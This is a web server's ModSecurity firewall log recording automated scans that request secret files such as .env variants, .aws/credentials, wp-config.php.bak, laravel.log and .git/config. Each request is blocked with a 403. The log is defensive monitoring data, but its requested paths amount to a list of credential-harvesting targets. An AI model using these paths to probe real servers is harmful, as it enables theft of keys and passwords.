[Mon Nov 24 09:48:42.802189 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aSQb6mQD9_sbehPhIhHheAAAAAQ"]
[Mon Nov 24 09:48:42.802403 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aSQb6mQD9_sbehPhIhHheAAAAAQ"]
[Mon Nov 24 09:48:42.979491 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aSQb6q1ne1xotegg6nCJKQAAAAk"]
[Mon Nov 24 09:48:42.979717 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aSQb6q1ne1xotegg6nCJKQAAAAk"]
[Mon Nov 24 09:48:42.979900 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aSQb6q1ne1xotegg6nCJKQAAAAk"]
[Mon Nov 24 09:48:43.020882 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aSQb661ne1xotegg6nCJKgAAAAk"]
[Mon Nov 24 09:48:43.021109 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aSQb661ne1xotegg6nCJKgAAAAk"]
[Mon Nov 24 09:48:43.021294 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/crm/.env"] [unique_id "aSQb661ne1xotegg6nCJKgAAAAk"]
[Mon Nov 24 09:48:43.055527 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aSQb661ne1xotegg6nCJKwAAAAk"]
[Mon Nov 24 09:48:43.055758 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aSQb661ne1xotegg6nCJKwAAAAk"]
[Mon Nov 24 09:48:43.055978 2025] [:error] [pid 291192] [client 45.148.10.174:56116] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aSQb661ne1xotegg6nCJKwAAAAk"]
[Mon Nov 24 09:48:43.171205 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAAAAAAI"]
[Mon Nov 24 09:48:43.171450 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAAAAAAI"]
[Mon Nov 24 09:48:43.171655 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAAAAAAI"]
[Mon Nov 24 09:48:43.217547 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAQAAAAI"]
[Mon Nov 24 09:48:43.217824 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAQAAAAI"]
[Mon Nov 24 09:48:43.218024 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAQAAAAI"]
[Mon Nov 24 09:48:43.243080 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAgAAAAI"]
[Mon Nov 24 09:48:43.243367 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAgAAAAI"]
[Mon Nov 24 09:48:43.243562 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAgAAAAI"]
[Mon Nov 24 09:48:43.275185 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAwAAAAI"]
[Mon Nov 24 09:48:43.275555 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAwAAAAI"]
[Mon Nov 24 09:48:43.275824 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aSQb68L1iBXL_RQpp4IGAwAAAAI"]
[Mon Nov 24 09:48:43.313426 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSQb68L1iBXL_RQpp4IGBAAAAAI"]
[Mon Nov 24 09:48:43.313660 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSQb68L1iBXL_RQpp4IGBAAAAAI"]
[Mon Nov 24 09:48:43.313853 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSQb68L1iBXL_RQpp4IGBAAAAAI"]
[Mon Nov 24 09:48:43.369083 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSQb68L1iBXL_RQpp4IGBQAAAAI"]
[Mon Nov 24 09:48:43.369217 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSQb68L1iBXL_RQpp4IGBQAAAAI"]
[Mon Nov 24 09:48:43.369433 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSQb68L1iBXL_RQpp4IGBQAAAAI"]
[Mon Nov 24 09:48:43.369620 2025] [:error] [pid 289421] [client 45.148.10.174:56122] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSQb68L1iBXL_RQpp4IGBQAAAAI"]
[Mon Nov 24 09:53:00.779517 2025] [:error] [pid 294797] [client 45.148.10.174:56604] [client 45.148.10.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aSQc7A4k_W94gZNW8aYIewAAAAs"]
[Mon Nov 24 09:53:00.780766 2025] [:error] [pid 294797] [client 45.148.10.174:56604] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aSQc7A4k_W94gZNW8aYIewAAAAs"]
[Mon Nov 24 09:53:00.781014 2025] [:error] [pid 294797] [client 45.148.10.174:56604] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aSQc7A4k_W94gZNW8aYIewAAAAs"]
[Tue Nov 25 20:59:20.494989 2025] [:error] [pid 311062] [client 147.185.41.135:34048] [client 147.185.41.135] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSYKmEe4BGgV6fdhWTSlsQAAAAA"]
[Tue Nov 25 20:59:20.495262 2025] [:error] [pid 311062] [client 147.185.41.135:34048] [client 147.185.41.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSYKmEe4BGgV6fdhWTSlsQAAAAA"]
[Tue Nov 25 20:59:20.495429 2025] [:error] [pid 311062] [client 147.185.41.135:34048] [client 147.185.41.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSYKmEe4BGgV6fdhWTSlsQAAAAA"]
[Wed Nov 26 04:36:53.216976 2025] [authz_core:error] [pid 332764] [client 147.182.149.75:60874] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 26 04:36:54.319538 2025] [:error] [pid 332765] [client 147.182.149.75:60906] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSZ11q6rD5eHUPU8N3cgjAAAAAI"]
[Wed Nov 26 04:36:54.319768 2025] [:error] [pid 332765] [client 147.182.149.75:60906] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSZ11q6rD5eHUPU8N3cgjAAAAAI"]
[Wed Nov 26 04:36:54.320006 2025] [:error] [pid 332765] [client 147.182.149.75:60906] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSZ11q6rD5eHUPU8N3cgjAAAAAI"]
